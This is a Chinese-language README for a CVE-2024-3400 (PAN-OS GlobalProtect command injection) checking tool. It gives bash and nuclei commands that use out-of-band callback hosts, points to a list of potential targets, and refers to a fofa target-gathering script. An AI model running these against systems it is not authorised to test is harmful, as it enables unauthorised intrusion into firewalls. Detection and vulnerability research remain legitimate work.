

由于 Palo Alto Networks PAN-OS 软件中 GlobalProtect 功能的任意文件创建漏洞导致的命令注入,影响了特定 PAN-OS 版本和特定功能配置,可能允许未经身份验证的攻击者以 root 权限在防火墙上执行任意代码。
Cloud NGFW、Panorama 设备和 Prisma Access 不受此漏洞影响。
该仓库包含一个 Nuclei 模板,旨在检测与 Palo Alto PAN-OS 漏洞相关的问题,特别是针对 CVE-2024-3400。
综合研究列表由以下来源提供:
[1] https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
[2] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
执行以下命令运行 Bash 脚本:
./CVE-2024-3400.sh http://target
或
sh CVE-2024-3400.sh http://target
脚本将检查文件是否被创建(返回 200 OK 状态)。如果成功,它将验证文件是否存在(返回 403 Forbidden 状态)。
interactsh-client -v
nuclei -t ./CVE20243400.yaml -u http://target -V telemetry=xyz.oast.fun -debug
nuclei -t ./telemet.yaml -l pa-urls.txt -V telemetry=subdomain.ipv6.1433.eu.org
潜在目标列表可在 此处 找到。
python fofax3r.py
本 README.md 提供了有关漏洞、如何使用提供的脚本、潜在目标以及作者信息。如果您需要任何进一步调整,请告知!